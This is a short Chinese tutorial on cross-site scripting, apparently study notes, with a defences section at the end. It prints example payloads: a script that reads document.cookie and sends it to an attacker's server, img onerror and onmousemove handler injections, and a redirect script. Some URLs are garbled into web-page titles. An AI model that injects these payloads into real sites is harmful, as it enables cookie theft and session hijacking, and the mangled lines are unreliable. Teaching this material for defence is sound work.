XSS全稱Cross Site Scripting，不叫css是為了和樣式表區(qū)分開，其核心原理就是在目標網(wǎng)頁中執(zhí)行惡意的 js 代碼。

舉個常見例子： A 網(wǎng)站有個用戶評論的功能，假設(shè) A 網(wǎng)站未做任何預(yù)防XSS的措施，攻擊者可以通過輸入以下內(nèi)容：'

<script>

? ? const cookie = document.cookie;

? ? // ajax 將cookie發(fā)送到攻擊者自己的服務(wù)器（偽代碼）

? ? ajax('Attacker - The Domain Name Attacker.com is Now For Sale.', cookie);

</script>

A網(wǎng)站將該內(nèi)容保存到服務(wù)器并展示在前端頁面，這時用戶A剛好訪問該網(wǎng)頁的該評論頁面，用戶A的瀏覽器識別script，直接執(zhí)行scirpt中的代碼，最終用戶A關(guān)于A網(wǎng)站的cookie全部被發(fā)送到了攻擊者的服務(wù)器上了，恰巧A網(wǎng)站的登錄憑證都是放在cookie中的，攻擊者此時完全可以以用戶A的身份登錄A網(wǎng)站。

XSS的攻擊方式

除了上面提到的script方式，還有<img onerror />之類的也可以利用，如：

// 利用img的onerror中可以執(zhí)行腳本

<img src='' onerror='alert("hey!")'>

// 鼠標只要在該標簽上移動就會執(zhí)行

<a onmousemove='do something here'>

<div onmousemove=do something here'>

XSS的攻擊意圖

竊取目標網(wǎng)頁中的cookie值

可通過服務(wù)端設(shè)置cookie為http only（需要瀏覽器支持，畢竟cookie的所有權(quán)屬于瀏覽器）。

劫持流量實現(xiàn)惡意跳轉(zhuǎn)

插入類似如下代碼：

<script>window.location.href="百度一下，你就知道";</script>

相當于偷目標網(wǎng)站的流量。

防范手段

過濾<script>、<img>、<a>等標簽

對用戶上傳的內(nèi)容進行轉(zhuǎn)換編碼，這樣做瀏覽器是不會對該標簽進行解釋執(zhí)行的，同時也不影響顯示效果。

2021網(wǎng)絡(luò)安全滲透測試CTF學(xué)習(xí)資料&筆記（更新中）